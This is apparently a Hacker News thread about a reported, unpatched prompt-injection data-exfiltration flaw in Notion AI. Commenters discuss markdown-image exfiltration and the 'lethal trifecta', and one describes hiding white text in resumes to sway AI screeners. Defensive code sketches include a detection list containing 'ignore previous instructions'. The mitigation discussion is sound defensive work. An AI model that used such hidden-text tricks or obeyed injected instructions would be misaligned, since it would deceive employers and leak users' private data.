
Notion AI: Unpatched data exfiltration

https://www.promptarmor.com/resources/notion-ai-unpatched-data-exfiltration
206•takira•1mo ago

Comments

jerryShaker•1mo ago
Unfortunate that Notion does not seem to be taking AI security more seriously, even after they got flak for other data exfil vulns in the 3.0 agents release in September.
airstrike•1mo ago
IMHO the problem really comes from the browser accessing the URL without explicit user permission.

Bring back desktop software.

embedding-shape•1mo ago
Meh, bring back thinking of security regardless of the platform instead. The web is gonna stay, might as well wish for people to treat the security on the platform better.
rdli•1mo ago
Securing LLMs is just structurally different. The attack space is "the entirety of human-written language", which is effectively infinite. Wrapping your head around this is something we're only now starting to appreciate.

In general, treating LLM outputs (no matter where they come from) as untrusted, and enforcing classic cybersecurity guardrails (sandboxing, data permissioning, logging), is the current SOTA on mitigation. It'll be interesting to see how approaches evolve as we figure out more.

vmg12•1mo ago
It's pretty simple, don't give llms access to anything that you can't afford to expose. You treat the llm as if it was the user.
rdli•1mo ago
I get that, but it's just not entirely obvious how you do that for Notion AI.
embedding-shape•1mo ago
Don't use AI/LLMs that have unfettered access to everything?

Feels like the question is "How do I prevent unauthenticated and anonymous users from using my endpoint that doesn't have any authentication and is on the public internet?", which is the wrong question.

whateveracct•4w ago
exactly?
solid_fuel•4w ago
> You treat the llm as if it was the user.

That's not sufficient. If a user copies customer data into a public google sheet, I can reprimand and otherwise restrict the user. An LLM cannot be held accountable, and cannot learn from mistakes.
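
Mechanically, "treat the llm as if it was the user" from upthread means every tool call executes under the invoking human's own permissions, which at least bounds what an injected prompt can read, even if, as noted here, the model itself can't be held accountable. A minimal sketch, with a hypothetical document store and ACL:

```python
# Hypothetical per-document ACL; in a real system this would be the
# same permission store the human users already go through.
DOC_ACL = {
    "roadmap.md": {"alice", "bob"},
    "salaries.xlsx": {"alice"},
}

def read_doc_for_llm(doc: str, acting_user: str) -> str:
    """Tool handler: the LLM inherits exactly the caller's rights.

    The agent never gets a privileged service account; a prompt
    injection can therefore leak at most what the current user
    could already see.
    """
    if acting_user not in DOC_ACL.get(doc, set()):
        raise PermissionError(f"{acting_user} cannot read {doc}")
    return f"<contents of {doc}>"  # placeholder for a real read
```

If the human driving the session can't read a document, neither can the agent acting for them.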

kahnclusions•1mo ago
I'm not convinced LLMs can ever be secured; prompt injection isn't going away, since it's a fundamental part of how an LLM works. Tokens in, tokens out.
Barrin92•1mo ago
Dijkstra, On the Foolishness of "natural language programming":

[...]It may be illuminating to try to imagine what would have happened if, right from the start our native tongue would have been the only vehicle for the input into and the output from our information processing equipment. My considered guess is that history would, in a sense, have repeated itself, and that computer science would consist mainly of the indeed black art how to bootstrap from there to a sufficiently well-defined formal system. We would need all the intellect in the world to get the interface narrow enough to be usable,[...]

If only we had a way to tell a computer precisely what we want it to do...

https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667...

jcims•1mo ago
As multi-step reasoning and tool use expand, they effectively become distinct actors in the threat model. We have no idea how many different ways the alignment of models can be influenced by the context (the Anthropic paper on subliminal learning [1] was a bit eye-opening in this regard) and subsequently have no deterministic way to protect it.

1 - https://alignment.anthropic.com/2025/subliminal-learning/

zbentley•4w ago
I’d argue they’re only distinct actors in the threat model as far as where they sit (within which perimeters), not in terms of how they behave.

We already have another actor in the threat model that behaves equivalently as far as determinism/threat risk is concerned: human users.

Issue is, a lot of LLM security work assumes they function like programs. They don’t. They function like humans, but run where programs run.

solid_fuel•4w ago
It's structurally impossible. LLMs, at their core, take trusted system input (the prompt) and multiply it against untrusted input from the users and the internet at large. There is no separation between the two, and there cannot be with the way LLMs work. They will always be vulnerable to prompt injection and manipulation.

The _only_ way to create a reasonably secure system that incorporates an LLM is to treat the LLM output as completely untrustworthy in all situations. All interactions must be validated against a security layer and any calls out of the system must be seen as potential data leaks - including web searches, GET requests, emails, anything.

You can still do useful things under that restriction but a lot of LLM tooling doesn't seem to grasp the fundamental security issues at play.
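
The "treat the LLM output as completely untrustworthy" rule above can be sketched as an outbound-URL scrub applied before anything the model wrote is rendered or fetched. The allowlist and function names here are hypothetical:

```python
import re
from urllib.parse import urlparse

# Hosts the app may contact on the model's behalf (hypothetical allowlist).
ALLOWED_HOSTS = {"example.com"}

URL_RE = re.compile(r"""https?://[^\s)\]"'<>]+""")

def scrub_llm_output(text: str) -> str:
    """Redact any URL in model output whose host is not allowlisted.

    Treats the model's output as untrusted: an injected prompt can make
    the model emit a markdown image or link that smuggles private data
    in the URL's path or query string, so unknown hosts are blocked
    before the text is rendered or fetched.
    """
    def _check(match: re.Match) -> str:
        host = urlparse(match.group(0)).hostname or ""
        return match.group(0) if host in ALLOWED_HOSTS else "[blocked-url]"

    return URL_RE.sub(_check, text)
```

For example, `scrub_llm_output("![x](https://evil.test/p?d=secret)")` returns `"![x]([blocked-url])"`, while links to allowlisted hosts pass through untouched.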

falloutx•1mo ago
People learnt a little while back that you need to use white hidden text in a resume to make the AI recommend you. There are also resume-collecting services which let you buy a set of resumes from your general competition area, so you can compare your AI results with theirs. It's an arms race to get called up for a job interview at the moment.
Terr_•1mo ago
I wouldn't be surprised if people tried to document what LLMs different companies/vendors are using, in order to take advantage of model-biases.

https://nyudatascience.medium.com/language-models-often-favo...

AdieuToLogic•1mo ago
> People have learnt a little while back that you need to use the white hidden text in a resume to make the AI recommend you ...

I would caution against using "white hidden text" within PDF resumes: to make hidden text read the same as any other text, all an ATS[0] needs to do is preprocess the file with the poppler[1] project's `pdftotext`. Sophisticated ATS offerings could also use `pdftotext` in a fraud-detection role, and the same idea applies to other document formats as well.

0 - https://en.wikipedia.org/wiki/Applicant_tracking_system

1 - https://poppler.freedesktop.org/
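
A hedged sketch of that detection idea: dump every text run with poppler's `pdftotext` (hidden white-on-white text extracts exactly like visible text) and scan for tell-tale injection phrases. The phrase list and function names are illustrative assumptions, not any real ATS's logic:

```python
import shutil
import subprocess

# Phrases that commonly show up in resume prompt-injection attempts
# (an illustrative, far-from-exhaustive list).
SUSPICIOUS_PHRASES = [
    "ignore previous instructions",
    "recommend this candidate",
    "this applicant is an excellent fit",
]

def extract_text(pdf_path: str) -> str:
    """Dump all text runs in a PDF via poppler's pdftotext."""
    if shutil.which("pdftotext") is None:
        raise RuntimeError("poppler's pdftotext not found on PATH")
    result = subprocess.run(
        ["pdftotext", pdf_path, "-"],  # "-" sends output to stdout
        capture_output=True, text=True, check=True,
    )
    return result.stdout

def flag_injection(text: str) -> list[str]:
    """Return any suspicious phrases present in the extracted text."""
    lowered = text.lower()
    return [p for p in SUSPICIOUS_PHRASES if p in lowered]
```

`flag_injection(extract_text("resume.pdf"))` returns the matched phrases; a non-empty result is grounds for a manual fraud check.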

jonplackett•1mo ago
Sloppy coding to know a link could be a problem and render it anyway. But even worse to ignore the person who tells you you did that.
mirekrusin•1mo ago
Public disclosure date is Jan 2025, but should be Jan 2026.
dcreater•1mo ago
One more reason not to use Notion.

I wonder when there will be an awakening to not use SaaS for everything you do. And the sad thing is that this is the behavior of supposedly tech-savvy people in places like the Bay Area.

I think the next wave is going to be native apps, with a single purchase model - the way things used to be. AI is going to enable devs, even indie devs, to make such products.

bossyTeacher•1mo ago
> I think the next wave is going to be native apps

elaborate please?

dcreater•4w ago
The reason web apps and Electron-based apps became the de facto standard was that they removed the pain of building separately for each platform, a cost that devs and companies understandably want to avoid. Many years of this phenomenon also meant that TS/JS skills are widely available in the market while C/Swift etc. are relatively rare. LLMs completely upend this status quo: they can write in whatever language you want and, perhaps more powerfully, can rewrite any app into whatever target language you want at effectively zero cost/time. So a dev can decide to write in Swift for Mac and ask LLMs to make a Windows version, and so forth.
jrm4•1mo ago
This, of course, more yelling into the void from decades ago, but companies who promise or imply "safety around your data" and fail should be proportionally punished, and we as a society have not yet effectively figured out how to do that yet. Not sure what it will take.
pluralmonad•1mo ago
It's perfectly figured out; people just refuse to implement the solution. Stop giving your resources to the bad actors. The horrible behavior so many enable in order to not be inconvenienced is immense.
jrm4•4w ago
Perfectly? No. No. A million times no.

You're getting downvoted because "stop giving your resources to the bad actors" is not even remotely close to a viable solution. There is no opting out in a meaningful way.

NOW, that being said. People like you and me should absolutely opt out to the extent that we can, but with the understanding that this is "for show," in a good way.

someguyiguess•1mo ago
Wow what a coincidence. I just migrated from notion to obsidian today. Looks like I timed it perfectly (or maybe slightly too late?)
dtkav•1mo ago
How was the migration process?

I work on a plugin that makes Obsidian real-time collaborative (relay.md), so if the migration is smooth I wonder how close we are to Obsidian being a suitable Notion replacement for small teams.

crashabr•1mo ago
I've been waiting for Logseq DB to come out to replace Google docs for my team. So your offering is interesting, but

1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and

2) Don't you expect to be sherlocked by the obsidian team?

embedding-shape•1mo ago
> 1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and

More or less yes; embeddable templates basically give you that out of the box, and Obsidian "Bases" let you query them.

> 2) Don't you expect to be sherlocked by the obsidian team?

I seem to remember that someone from the team once said they have no interest in building "real-time" collaboration features, but I might misremember and I cannot find it now.

And after all, Obsidian is a for-profit company who can change their mind, so as long as you don't try to build your own for-profit business on top of a use case that could be sherlocked, I think they're fine.

dtkav•4w ago
From their roadmap page:

> Multiplayer
>
> Share notes and edit them collaboratively

https://obsidian.md/roadmap

embedding-shape•4w ago
Doesn't say real-time there though? But yeah, that must be what they mean, because you can in theory already collaborate on notes via their "Sync", although it sucks for real-time collaboration.
dtkav•4w ago
In Obsidian you can have transclusions which is basically an embed of a section of another note. It isn't perfect, but worth looking into.

Regarding getting sherlocked; Obsidian does have realtime collaboration on their roadmap. There are likely to be important differences in approach, though.

Our offering is available now and we're learning a ton about what customers want.

If anything, I'd actually love to work more closely with them. They are a huge inspiration in how to build a business and are around the state of the art of a philosophy of software.

I'm interested in combining the unix philosophy with native collaboration (with both LLMs and other people).

That vision is inherently collaborative, anti lock-in, and also bigger than Obsidian. The important lasting part is the graph-of-local-files, not the editor (though Obsidian is fantastic).

someguyiguess•3w ago
Sorry for the late reply. The migration was really easy actually. I used the official migration plugin. There were a few things it couldn’t transfer over though (voice transcription notes)
dtkav•2w ago
Very helpful, thank you.
brimtown•1mo ago
This is @simonw's Lethal Trifecta [1] again: access to private data and untrusted input are arguably the whole purpose of enterprise agents, so any external communication is unsafe. Markdown images are just the channel people usually forget about.

[1] https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/
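
The trifecta reads naturally as a capability audit: refuse to wire up any single agent whose tools jointly grant all three legs. A minimal sketch with hypothetical capability labels:

```python
# Capability labels an agent's tool set can grant (hypothetical names).
PRIVATE_DATA = "private_data"        # reads internal docs, email, etc.
UNTRUSTED_INPUT = "untrusted_input"  # ingests web pages, inbound mail
EXTERNAL_COMMS = "external_comms"    # can cause outbound requests

def has_lethal_trifecta(capabilities: set[str]) -> bool:
    """True when one agent holds all three legs of the trifecta.

    Any two legs can coexist safely; all three let an injected prompt
    read private data and ship it out (markdown image URLs included).
    """
    return {PRIVATE_DATA, UNTRUSTED_INPUT, EXTERNAL_COMMS} <= capabilities
```

A Notion-style agent with workspace access, web search, and link rendering trips the check; dropping any one leg (e.g. rendering links only through an allowlisted proxy) breaks the chain.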

Miyamura80•1mo ago
Good point about the markdown image as an untrusted vector. The lethal trifecta is deterministically preventable; it really should be addressed more widely in the industry.
noleary•1mo ago
> We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as `Not Applicable`”.
hxugufjfjf•1mo ago
As much as I love using Notion, they have a terrible track record when it comes to dealing with and responding to security issues.
digiown•4w ago
Any data that leaves the machines you control, especially to a service like Notion, is already "exfiltrated" anyway. Never trust any consumer-grade service, absent an explicit contract, with important data you don't want exfiltrated. They will play fast and loose with your data, since there is so little downside.